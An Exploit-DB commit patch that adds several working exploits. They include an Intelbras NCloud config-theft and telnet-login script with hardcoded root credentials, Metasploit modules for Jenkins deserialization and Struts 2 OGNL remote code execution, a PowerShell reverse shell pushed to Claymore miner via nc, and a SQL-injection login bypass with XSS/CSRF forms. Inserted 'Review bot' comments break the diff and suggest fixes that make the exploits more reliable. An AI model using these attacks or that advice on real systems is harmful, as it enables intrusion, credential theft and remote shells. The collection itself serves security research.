From 5aca1b9763223d341a4ef808f1ae02b8103d0086 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 18 May 2018 05:01:49 +0000 Subject: [PATCH] DB: 2018-05-18 8 changes to exploits/shellcodes Linux < 4.16.9 / < 4.14.41 - 4-byte Infoleak via Uninitialized Struct Field in compat adjtimex Syscall Libuser - roothelper Privilege Escalation (Metasploit) Libuser - 'roothelper' Privilege Escalation (Metasploit) Inteno IOPSYS 2.0 - 4.2.0 p910nd - Remote Command Execution Inteno IOPSYS 2.0 < 4.2.0 - 'p910nd' Remote Command Execution Nanopool Claymore Dual Miner 7.3 - Remote Code Execution Jenkins CLI - HTTP Java Deserialization (Metasploit) Apache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit) NodAPS 4.0 - SQL injection / Cross-Site Request Forgery Intelbras NCLOUD 300 1.0 - Authentication bypass SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass Powerlogic/Schneider Electric IONXXXX Series - Cross-Site Request Forgery --- exploits/hardware/webapps/44637.py | 80 +++++++ exploits/linux/dos/44641.c | 76 +++++++ exploits/linux/remote/44642.rb | 350 +++++++++++++++++++++++++++++ exploits/linux/webapps/44640.txt | 62 +++++ exploits/multiple/remote/44643.rb | 117 ++++++++++ exploits/php/webapps/44636.txt | 44 ++++ exploits/php/webapps/44639.txt | 38 ++++ exploits/windows/remote/44638.txt | 25 +++ files_exploits.csv | 12 +- 9 files changed, 802 insertions(+), 2 deletions(-) create mode 100755 exploits/hardware/webapps/44637.py create mode 100644 exploits/linux/dos/44641.c create mode 100755 exploits/linux/remote/44642.rb create mode 100644 exploits/linux/webapps/44640.txt create mode 100755 exploits/multiple/remote/44643.rb create mode 100644 exploits/php/webapps/44636.txt create mode 100644 exploits/php/webapps/44639.txt create mode 100644 exploits/windows/remote/44638.txt 
diff --git a/exploits/hardware/webapps/44637.py b/exploits/hardware/webapps/44637.py new file mode 100755 index 000000000..78cf3778e --- /dev/null +++ b/exploits/hardware/webapps/44637.py 
@@ -0,0 +1,80 @@ +# coding: utf-8 +# Exploit Title: Intelbras NCloud Authentication bypass +# Date: 16/05/2018 +# Exploit Author: Pedro Aguiar - pedro.aguiar@kryptus.com +# Vendor Homepage: http://www.intelbras.com.br/ +# Software Link: http://www.intelbras.com.br/empresarial/wi-fi/para-sua-casa/roteadores/ncloud +# Version: 1.0 +# Tested on: Linux +# CVE : CVE-2018-11094 +# Description: As described here: https://blog.kos-lab.com/Hello-World/ the Ncloud 300 device does not properly +# enforce authentication, allowing an attacker to remotely download the configurations backup ('/cgi-bin/ExportSettings.sh'). +# The configurations backup file contains the web interface username and password. +# Also, there are hardcoded credentials in the telnet service (root:cary), in cases where root user does not exist, +# it was replaced by the web interface credentials. This exploit downloads the backup file and tries to use the credentials +# to log into the device using telnet. + +import sys +import requests +import telnetlib +import re + +def help(): + print 'Usage: ' + print 'python exploit.py http://192.168.0.1' + +def pop_shell(host, user, password): + if(user == "root"): + print '[+] Trying default credentials: root:cary' + else: + print '[+] Trying credentials obtained from /cgi-bin/ExportSettings.sh' + with open('NCLOUD_config.dat', "r") as f: + content = f.read() + user = content.split("Login=")[1].split("\n")[0] + password = content.split("Password=")[1].split("\n")[0] + #print 'User: '+ user + #print 'Password: '+ password + f.close() + try: + ip = re.findall( r'[0-9]+(?:\.[0-9]+){3}', host)[0] + tn = telnetlib.Telnet(ip, 23, timeout=10) + tn.expect(["WORKGROUP login:"], 5) + tn.write(user + "\r\n") + tn.expect(["Password:"], 5) + tn.write(password + "\r\n") + i = tn.expect(["Login incorrect"], 5) + if i[0] != -1: + raise ValueError('[-] Wrong credential') + tn.write("cat /proc/cpuinfo\r\n") + tn.interact() + + tn.close() + except Exception as e: + print e + if(user 
== "root"): + pop_shell(host, 'try', 'again') + +def exploit(host): + print '[*] Connecting to %s' %host + path = '/cgi-bin/ExportSettings.sh' + payload = 'Export=Salvar' + + response = requests.post(host + path, data=payload) + response.raise_for_status() + + if(response.status_code == 200 and "Login=" in response.text): + print '[+] Config download was successful' + print '[+] Saving backup file to NCLOUD_config.dat' + with open('NCLOUD_config.dat', "w") as f: + f.write(response.text) + f.close() + pop_shell(host, "root", "cary") +def main(): + if len(sys.argv) < 2 or not sys.argv[1].startswith('http://'): + help() + return + host = sys.argv[1] + exploit(host) + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/linux/dos/44641.c b/exploits/linux/dos/44641.c new file mode 100644 index 000000000..ec4141d45 --- /dev/null +++ b/exploits/linux/dos/44641.c 
@@ -0,0 +1,76 @@ +/* +Commit 3a4d44b61625 ("ntp: Move adjtimex related compat syscalls to native +counterparts") removed the memset() in compat_get_timex(). Since then, the +compat adjtimex syscall can invoke do_adjtimex() with an uninitialized +->tai. If do_adjtimex() doesn't write to ->tai (e.g. because the arguments +are invalid), compat_put_timex() then copies the uninitialized ->tai field +to userspace. + +Demo: + + +$ cat leak_32.c +*/ + +#include +#include +#include +#include +#include +#include +#include + +/* from include/linux/timex.h */ +#define ADJ_ADJTIME 0x8000 + +int main(void) { + struct timex tx; + memset(&tx, 0, sizeof(tx)); + tx.modes = ADJ_ADJTIME; /* invalid, causes early bailout */ + int res = adjtimex(&tx); + assert(res == -1 && errno == EINVAL); + printf("0x%08x\n", (unsigned int)tx.tai); + return 0; +} + +/* +$ gcc -o leak_32 leak_32.c -Wall -m32 +$ for i in {0..10}; do sleep 1; ./leak_32; done +0x01a300b0 +0x0be8f6f0 +0x0610d5f0 +0x01fa0170 +0x0bf05670 +0x0bf05670 +0x0610d5f0 +0x0610cd70 +0x0610d5f0 +0x0610d5f0 + + +Fixed in master: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0a0b98734479aa5b3c671d5190e86273372cab95 + + +Fix it by adding the memset() back. + +Fixes: 3a4d44b61625 ("ntp: Move adjtimex related compat syscalls to native counterparts") +Signed-off-by: Jann Horn +--- + kernel/compat.c | 1 + + 1 file changed, 1 insertion(+) + +diff --git a/kernel/compat.c b/kernel/compat.c +index 6d21894806b4..92d8c98c0f57 100644 +--- a/kernel/compat.c ++++ b/kernel/compat.c +@@ -34,6 +34,7 @@ int compat_get_timex(struct timex *txc, const struct compat_timex __user *utp) + { + struct compat_timex tx32; + ++ memset(txc, 0, sizeof(struct timex)); + if (copy_from_user(&tx32, utp, sizeof(struct compat_timex))) + return -EFAULT; + +-- +2.17.0.441.gb46fe60e1d-goog +*/ \ No newline at end of file diff --git a/exploits/linux/remote/44642.rb b/exploits/linux/remote/44642.rb new file mode 100755 index 000000000..a46ebbe14 
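Review bot: The only vulnerable/not-vulnerable signal in this PoC is the printed `tx.tai`, and nothing in the file tells the reader how to read it: the demo output shows varying non-zero values, while a kernel carrying the quoted `memset()` fix prints `0x00000000` on every run. A comment above the `printf` such as `/* varying non-zero output = uninitialized kernel memory leaked; constant 0x00000000 = fixed kernel */` would make the result actionable. The `-m32` in the build line is load-bearing rather than incidental, since only the compat entry point goes through `compat_get_timex()`, and deserves a one-line comment saying so. The `assert(res == -1 && errno == EINVAL)` also disappears under `-DNDEBUG`, after which the `printf` runs whether or not the early bailout was taken; an explicit `if (...) { perror(...); return 1; }` is the safer form.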
--- /dev/null +++ b/exploits/linux/remote/44642.rb 
@@ -0,0 +1,350 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + STAGE1 = "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" + # java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections6 'touch /tmp/wtf' + STAGE2 = "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" + + SEARCH_REQUEST = 3 + SEARCH_RES_ENTRY = 4 + SEARCH_RES_DONE = 5 + ABANDON_REQUEST = 16 + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Jenkins CLI HTTP Java Deserialization Vulnerability', + 'Description' => %q{ + This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on + the Jenkins, which allows remote arbitrary code execution via HTTP. Authentication is not + required to exploit this vulnerability. + + }, + 'Author' => + [ + 'Matthias Kaiser', # Original Vulnerability discovery + 'Alisa Esage', # Private Exploit + 'Ivan', # Metasploit Module Author + 'YSOSerial' #Stage 2 payload + ], + 'License' => MSF_LICENSE, + 'Platform' => ['linux', 'unix'], + 'Arch' => ARCH_CMD, + 'Targets' => [ [ 'Jenkins 2.31', {} ] ], + 'References' => + [ + ['CVE', '2016-9299'], + ['URL', 'https://github.com/jenkinsci-cert/SECURITY-218'], + ['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2016-11-16'], + ['URL', 'http://www.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class-deepsec-edition'], + ['URL', 'https://github.com/frohoff/ysoserial'] + ], + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'cmd' + } + }, + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Nov 16 2016' + )) + + register_options([ + OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']), + Opt::RPORT('8080'), + OptAddress.new('SRVHOST', [ true, "The local host to listen on for the ldap server. 
This must be an address on the local machine or 0.0.0.0", '127.0.0.1' ]), + OptPort.new('SRVPORT', [ true, "The local port to listen on for the ldap server.", 1389 ]), + OptAddress.new('LDAPHOST', [ true, "The ldap host the exploit will try to connect to ", '127.0.0.1' ]) + ]) + end + + def target_uri + begin + URI(datastore['TARGETURI']) + rescue ::URI::InvalidURIError + print_error "Invalid URI: #{datastore['TARGETURI'].inspect}" + raise Msf::OptionValidateError.new(['TARGETURI']) + end + end + + def normalize_uri(*strs) + new_str = strs * "/" + + new_str = new_str.gsub!("//", "/") while new_str.index("//") + + # Makes sure there's a starting slash + unless new_str[0,1] == '/' + new_str = '/' + new_str + end + + new_str + end + + def aseq(x, tag) + s = seq(x) + s.tag_class = :APPLICATION + s.tag = tag + s + end + + def seq(x) + OpenSSL::ASN1::Sequence.new(x) + end + + def int(x) + OpenSSL::ASN1::Integer.new(x) + end + + def string(x) + OpenSSL::ASN1::OctetString.new(x) + end + + def set(x) + OpenSSL::ASN1::Set.new(x) + end + + def enum(x) + OpenSSL::ASN1::Enumerated.new(x) + end + + + def java_string(s) + length = s.length + + packed_length = [length].pack("S>") + + "#{packed_length}#{s}" + end + + def search_res_done(message_id) + s = seq([ + int(message_id), + aseq([enum(0), string(""), string("")], SEARCH_RES_DONE) + ]) + s.to_der + end + + def make_stage2(command) + [STAGE2].pack("H*").gsub("\x00\x0Etouch /tmp/wtf", java_string(command)) + end + + + def make_stage2_reply(command, message_id) + + java_class_name_attributes = seq([string("javaClassName"), set([string("WTF")])]) + java_serialized_data_attributes = seq([string("javaSerializedData"), set([string(make_stage2(command))])]) + attributes = seq([java_class_name_attributes, java_serialized_data_attributes]) + s = seq([ + int(message_id), + aseq([string("cn=wtf, dc=example, dc=com"), attributes], SEARCH_RES_ENTRY)]) + s.to_der + end + + + + def make_stage1(ldap_url) + 
[STAGE1].pack("H*").gsub("\x00\x15ldap://localhost:1234", java_string(ldap_url)) + end + + + def read_ldap_packet(socket) + + buffer = "" + + bytes = socket.read(2) + if bytes[0] != "0" + raise "NOT_LDAP: #{bytes.inspect} #{bytes[0]}" + end + + buffer << bytes + + length = bytes[1].ord + if (length & (1<<7)) != 0 + length_bytes_length = length ^ (1<<7) + + length_bytes = socket.read(length_bytes_length) + buffer << length_bytes + length = length_bytes.bytes.reduce(0) {|c, e| (c << 8) + e} + end + + buffer << socket.read(length) + buffer + end + + + def write_chunk(socket, chunk) + socket.write(chunk.bytesize.to_s(16) + "\r\n") + socket.write(chunk) + socket.write("\r\n") + end + + def exploit + uuid = SecureRandom.uuid + + ldap_port = datastore["SRVPORT"] + ldap_host = datastore["SRVHOST"] + ldap_external_host = datastore["LDAPHOST"] + + command = payload.encoded + host = datastore["RHOST"] + + ldap = TCPServer.new(ldap_host, ldap_port) + + cli_path = normalize_uri(target_uri.path, "cli") + + begin + + download = connect() + + begin + + download.write("POST #{cli_path} HTTP/1.1\r\n" + + "Host: #{host}\r\n" + + "User-Agent: curl/7.36.0\r\n" + + "Accept: */*\r\n" + + "Session: #{uuid}\r\n" + + "Side: download\r\n" + + "Content-Length: 0\r\n" + + "Content-Type: application/x-www-form-urlencoded\r\n\r\n") + + download.read(20) + + upload = connect() + begin + upload.write("POST #{cli_path} HTTP/1.1\r\n" + + "Host: #{host}\r\n" + + "User-Agent: curl/7.36.0\r\n" + + "Accept: */*\r\n" + + "Session: #{uuid}\r\n" + + "Side: upload\r\n" + + "Content-type: application/octet-stream\r\n" + + "Transfer-Encoding: chunked\r\n\r\n") + + write_chunk(upload, "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=") + write_chunk(upload, "\00\00\00\00") + + upload.flush + + stage1 = make_stage1("ldap://#{ldap_external_host}:#{ldap_port}") + + chunk_header = [stage1.bytesize].pack("S>") + write_chunk(upload, chunk_header 
+ stage1) + + upload.flush + + client = ldap.accept + begin + + # this hardcodes an ldap conversation + + # read bindRequest + read_ldap_packet(client) + + # write bindResponse + client.write(["300c02010161070a010004000400"].pack("H*")) + + # read searchRequest + read_ldap_packet(client) + + # write searchResEntry + client.write(["3034020102642f04066f753d777466302530230411737562736368656d61537562656e747279310e040c636e3d737562736368656d61"].pack("H*")) + + # write searchResDone + client.write(search_res_done(2)) + + # read abandonReqeust or searchRequest + bytes = read_ldap_packet(client) + packet = OpenSSL::ASN1.decode(bytes) + + # abandonRequest packet is sometimes sent + # so we distinguish between abandonRequest/searchRequest + + tag = packet.value[1].tag + if tag == ABANDON_REQUEST + + bytes = read_ldap_packet(client) + packet = OpenSSL::ASN1.decode(bytes) + tag = packet.value[1].tag + end + + if tag == SEARCH_REQUEST + + message_id = packet.value[0].value.to_int + # write searchResEntry + client.write(make_stage2_reply(command, message_id)) + + # write searchResDone + client.write(search_res_done(message_id)) + else + raise "Unexpected packet: #{tag}" + end + + client.flush + ensure + client.close + end + ensure + upload.close + end + ensure + download.close + end + + ensure + ldap.close + end + end + + def check + result = Exploit::CheckCode::Safe + + begin + if vulnerable? + result = Exploit::CheckCode::Vulnerable + end + rescue Msf::Exploit::Failed => e + vprint_error(e.message) + return Exploit::CheckCode::Unknown + end + + result + end + + def vulnerable? 
+ res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path) + }) + unless res + fail_with(Failure::Unknown, 'The connection timed out.') + end + + http_headers = res.headers + + http_headers['X-Jenkins'] && http_headers['X-Jenkins'] <= "2.31" + end + + # Connects to the server, creates a request, sends the request, + # reads the response + # + # Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi. + # + def send_request_cgi(opts={}, timeout = 20) + + begin + c = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT']) + c.connect + r = c.request_cgi(opts) + c.send_recv(r, timeout) + rescue ::Errno::EPIPE, ::Timeout::Error + nil + end + end + +end \ No newline at end of file diff --git a/exploits/linux/webapps/44640.txt b/exploits/linux/webapps/44640.txt new file mode 100644 index 000000000..16094f000 --- /dev/null +++ b/exploits/linux/webapps/44640.txt @@ -0,0 +1,62 @@ +# Exploit Title: Powerlogic Schneider Electric IONXXXX Series - Cross-Site Request Forgery +# Date: 2018-05-17 +# Exploit Author: t4rkd3vilz +# Vendor Homepage: http://www.schneider-electric.com/ +# Version: ION73XX series, ION75XX series, ION76XX series, ION8650 series, ION8800 series, PM5XXX series. +# Tested on: All Version +# CVE : CVE-2016-5809 + +# PoC + + +
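Review bot: `vulnerable?` decides with a plain string comparison, `http_headers['X-Jenkins'] <= "2.31"`, which is lexicographic: `"2.100" <= "2.31"` is true, so newer 2.x releases with a three-digit minor are reported Vulnerable. Compare versions instead, `Gem::Version.new(http_headers['X-Jenkins']) <= Gem::Version.new('2.31')`, guarded by `Gem::Version.correct?` so a malformed header yields Unknown rather than an exception. In `exploit`, `ldap.accept` has no timeout, so if the target cannot connect back to `LDAPHOST:SRVPORT` (egress filtering, wrong LDAPHOST) the module blocks forever while holding both CLI sockets; `IO.select([ldap], nil, nil, 30) or fail_with(Failure::Unreachable, 'No LDAP callback from target')` before the `accept` turns that into a clean failure. `read_ldap_packet` likewise calls `socket.read(2)` and indexes the result, which is nil at EOF and raises NoMethodError instead of a clear error.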
+select name="PMLSel_0x7800"> + + + + + + + + + + + + + + + + + + + + + + + + + + +
\ No newline at end of file diff --git a/exploits/multiple/remote/44643.rb b/exploits/multiple/remote/44643.rb new file mode 100755 index 000000000..3a38998e9 --- /dev/null +++ b/exploits/multiple/remote/44643.rb 
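Review bot: The header claims `Tested on: All Version`, which is not a test result; the entry should name the firmware build the CSRF was actually reproduced on and leave the affected-range claim to the Version line, which already lists ION73XX through PM5XXX. As shown here only the `select name="PMLSel_0x7800">` fragment of the form survives, so the action URL, method and remaining fields a reader needs to reproduce the request are not visible; if that is how the file was committed, the form is incomplete and the target path should be restored or at least named in the text.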
@@ -0,0 +1,117 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution', + 'Description' => %q{ This module exploits a remote code execution vulnerability in the Struts Showcase app in the Struts 1 plugin example in Struts 2.3.x series. Remote Code Execution can be performed via a malicious field value. }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'icez ', + 'Nixawk', + 'xfer0' + ], + 'References' => [ + [ 'CVE', '2017-9791' ], + [ 'BID', '99484' ], + [ 'EDB', '42324' ], + [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-048' ] + ], + 'Privileged' => true, + 'Targets' => [ + [ + 'Universal', { + 'Platform' => %w{ linux unix win }, + 'Arch' => [ ARCH_CMD ] + } + ] + ], + 'DisclosureDate' => 'Jul 07 2017', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/integration/saveGangster.action' ]), + OptString.new('POSTPARAM', [ true, 'The HTTP POST parameter', 'name' ]) + ] + ) + end + + def send_struts_request(ognl) + var_a = rand_text_alpha_lower(4) + var_b = rand_text_alpha_lower(4) + uri = normalize_uri(datastore['TARGETURI']) + + data = { + datastore['POSTPARAM'] => ognl, + 'age' => var_a, + '__checkbox_bustedBefore' => 'true', + 'description' => var_b + } + + resp = send_request_cgi({ + 'uri' => uri, + 'method' => 'POST', + 'vars_post' => data + }) + + if resp && resp.code == 404 + fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI') + end + resp + end + + def check + var_a = rand_text_alpha_lower(4) + var_b = rand_text_alpha_lower(4) + ognl = "%{'#{var_a}' + 
'#{var_b}'}" + + begin + resp = send_struts_request(ognl) + rescue Msf::Exploit::Failed + return Exploit::CheckCode::Unknown + end + + if resp && resp.code == 200 && resp.body.include?("#{var_a}#{var_b}") + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end + end + + def exploit + resp = exec_cmd(payload.encoded) + unless resp and resp.code == 200 + fail_with(Failure::Unknown, "Exploit failed.") + end + + print_good("Command executed") + print_line(resp.body) + end + + def exec_cmd(cmd) + ognl = "%{(#_='multipart/form-data')." + ognl << "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." + ognl << "(#_memberAccess?(#_memberAccess=#dm):" + ognl << "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." + ognl << "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." + ognl << "(#ognlUtil.getExcludedPackageNames().clear())." + ognl << "(#ognlUtil.getExcludedClasses().clear())." + ognl << "(#context.setMemberAccess(#dm))))." + ognl << "(#cmd='#{cmd}')." + ognl << "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." + ognl << "(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start())." + ognl << "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." + ognl << "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" + + send_struts_request(ognl) + end +end \ No newline at end of file diff --git a/exploits/php/webapps/44636.txt b/exploits/php/webapps/44636.txt new file mode 100644 index 000000000..8cf731bf8 --- /dev/null +++ b/exploits/php/webapps/44636.txt 
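Review bot: `exec_cmd` splices the payload directly into a single-quoted OGNL string, `ognl << "(#cmd='#{cmd}')."`, so any command containing `'` (common in shell payloads) terminates the literal and the expression fails to parse, surfacing only as the generic 'Exploit failed.'. Escape the quote before interpolating, `ognl << "(#cmd='#{cmd.gsub("'") { "\\'" }}')."`. Separately, `'Privileged' => true` asserts the session is privileged, but nothing on this page gives more than the servlet container's user, so it should be false unless the author has a reason not shown here. `exploit` also treats any HTTP 200 as success and prints the body, so a 200 that merely echoes the unevaluated OGNL back (target not vulnerable) is reported as 'Command executed'; checking that the body does not still contain the `ProcessBuilder` expression would catch that.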
@@ -0,0 +1,44 @@ +# Exploit Title: Online Booking system - NodAPS 4.0 - 'search' SQL injection / Cross-Site Request Forgery +# Date: 2018-05-16 +# Exploit Author: Borna nematzadeh (L0RD) +# Vendor Homepage: https://codecanyon.net/item/appointment-management-system-nodaps/16197805?s_rank=1535 +# Version: 4.0 +# Tested on: windows +================================================ +# POC 1 : SQLi + + +# test : test.com/en/providers?search=' +# Description: Put ' in the search parameter and you will have SQL syntax error. +You can use "extractvalue()" or "updatexml()" functions to get data from database. + +================================================ +# POC 2 : CSRF + +# Description: An issue was discovered in Online Booking system - NodAPS 4.0 script. +With Cross-site request forgery (CSRF) vulnerability , attacker can hijack the authentication of users remotely. + +================================================ + +# Exploit : + + + + CSRF POC + + +
+ + + + + + + +
+ + + \ No newline at end of file diff --git a/exploits/php/webapps/44639.txt b/exploits/php/webapps/44639.txt new file mode 100644 index 000000000..1c4224ae6 --- /dev/null +++ b/exploits/php/webapps/44639.txt @@ -0,0 +1,38 @@ +# Exploit Title: SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass +# Date: 2018-05-17 +# Exploit Author: L0RD +# Vendor Homepage: https://codecanyon.net/item/supercom-online-shopping-ecommerce-cart/17085987?s_rank=1442 +# Version: 1 +# Tested on: Kali linux + +# Description: SuperCom - Online Shopping Ecommerce Cart 1 suffers from multiple vulnerabilities : +# POC 1 : Persistent cross site scripting : + +1) After creating an account , go to your profile. +2) Navigate to "Update profile" and put this payload : +"/> +3) You will get an alert box in the page . + +# POC 2 : CSRF : Attacker can change user's authentication directly : + + + + CSRF POC + + +
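Review bot: The SQLi PoC stops at "put ' in the search parameter and you will have SQL syntax error", which shows the parameter reaches the query unescaped but not that data can be extracted; since the text already names `extractvalue()`/`updatexml()`, it should include the one concrete `search=` value that was used to confirm extraction, so a reader can distinguish a real injection from a generic error page. The CSRF section states the impact, but as shown here the form body carries no action URL or field names, so which state-changing request is forged is not visible; the target endpoint should be named in the text even if the HTML is fetched separately.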
+ + + +
+ + + + +# POC 3 : Authentication bypass : +Path : /admin +Username : ' or 0=0 # +Password : anything \ No newline at end of file diff --git a/exploits/windows/remote/44638.txt b/exploits/windows/remote/44638.txt new file mode 100644 index 000000000..647e6fa0b --- /dev/null +++ b/exploits/windows/remote/44638.txt @@ -0,0 +1,25 @@ +# Exploit Title: Nanopool Claymore Dual Miner >= 7.3 Remote Code Execution +# Date: 2018/02/09 +# Exploit Author: ReverseBrain +# Vendor Homepage: https://nanopool.org/ +# Software Link: https://github.com/nanopool/Claymore-Dual-Miner +# Version: 7.3 and later +# Tested on: Windows, Linux +# CVE : 2018-1000049 + +Suppose the miner is running on localhost on port 3333. First of all you need to convert a .bat string into hexadecimal format, for example, this one uses powershell to spawn a reverse shell on localhost listening on port 1234: + +powershell.exe -Command "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" + +Convert it into hexadecimal and paste it on the second parameter inside this string: + +echo '{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["reboot.bat","HEX_STRING"]}' | nc 127.0.0.1 3333 -v + +Then, to trigger the vulnerability just send {"id":0,"jsonrpc":"2.0","method":"miner_reboot"} +string to the miner. + +echo '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}' | nc 127.0.0.1 3333 -v + +You got the shell! + +This exploit works also on Linux, just substitute reboot.bat with reboot.bash or reboot.sh. \ No newline at end of file 
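Review bot: POC 3's `' or 0=0 #` in the admin Username field is a SQL injection in the login query (the `#` is a MySQL line comment), not a separate authentication-bypass bug; the text should say so and name the login script and parameter, since defenders looking for SQLi will otherwise miss it and the fix (a parameterized query in the admin login) differs from what "authentication bypass" suggests. The XSS and CSRF sections as shown carry only `"/>` and an empty form, so the injected profile field and the forged request's target are not visible; at minimum the text should name both.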
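Review bot: The PowerShell one-liner hard-codes `'127.0.0.1',1234` and the text never says these are the attacker's listener address and port to be replaced, nor that `%%{0}` is the batch-file escape for `%` that is right only because the string is written to `reboot.bat` and run by cmd.exe — the Linux variant needs a different shell payload, not just `reboot.bat` renamed to `reboot.sh`. The preconditions should also be stated: the PoC assumes the management API is reachable on port 3333 and accepts `miner_file`, and the page does not say which miner options control that, so a reader cannot tell why a `miner_file` call might be rejected. The title says `>= 7.3` while the CSV row added in this same commit says `7.3`; both should match the `Version: 7.3 and later` line.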
diff --git a/files_exploits.csv b/files_exploits.csv
index b22410737..f4d8d6993 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5972,6 +5972,7 @@ id,file,description,date,author,type,platform,port
 44615,exploits/windows/dos/44615.cpp,"2345 Security Guard 3.7 - '2345BdPcSafe.sys' Denial of Service",2018-05-11,anhkgg,dos,windows,
 44619,exploits/windows/dos/44619.cpp,"2345 Security Guard 3.7 - '2345NsProtect.sys' Denial of Service",2018-05-14,anhkgg,dos,windows,
 44629,exploits/ios/dos/44629.py,"WhatsApp 2.18.31 - Memory Corruption",2018-05-16,"Juan Sacco",dos,ios,
+44641,exploits/linux/dos/44641.c,"Linux < 4.16.9 / < 4.14.41 - 4-byte Infoleak via Uninitialized Struct Field in compat adjtimex Syscall",2018-05-17,"Google Security Research",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9714,7 +9715,7 @@ id,file,description,date,author,type,platform,port
 44603,exploits/windows/local/44603.txt,"Microsoft Windows FxCop 10/12 - XML External Entity Injection",2018-05-09,hyp3rlinx,local,windows,
 44614,exploits/windows/local/44614.txt,"EMC RecoverPoint 4.3 - 'Admin CLI' Command Injection",2018-05-11,"Paul Taylor",local,windows,
 44630,exploits/windows/local/44630.txt,"Microsoft Windows - Token Process Trust SID Access Check Bypass Privilege Escalation",2018-05-16,"Google Security Research",local,windows,
-44633,exploits/linux/local/44633.rb,"Libuser - roothelper Privilege Escalation (Metasploit)",2018-05-16,Metasploit,local,linux,
+44633,exploits/linux/local/44633.rb,"Libuser - 'roothelper' Privilege Escalation (Metasploit)",2018-05-16,Metasploit,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16490,7 +16491,10 @@ id,file,description,date,author,type,platform,port
 44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - 'sendfromfile.php?Filename' Authenticated 'Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
 44611,exploits/php/remote/44611.rb,"Mantis 1.1.3 - 'manage_proj_page' PHP Code Execution (Metasploit)",2018-05-10,Metasploit,remote,php,80
 44616,exploits/windows/remote/44616.py,"Microsoft Windows 2003 SP2 - 'RRAS' SMB Remote Code Execution",2018-05-13,vportal,remote,windows,
-44635,exploits/hardware/remote/44635.py,"Inteno IOPSYS 2.0 - 4.2.0 p910nd - Remote Command Execution",2018-05-16,neonsea,remote,hardware,9100
+44635,exploits/hardware/remote/44635.py,"Inteno IOPSYS 2.0 < 4.2.0 - 'p910nd' Remote Command Execution",2018-05-16,neonsea,remote,hardware,9100
+44638,exploits/windows/remote/44638.txt,"Nanopool Claymore Dual Miner 7.3 - Remote Code Execution",2018-05-17,ReverseBrain,remote,windows,
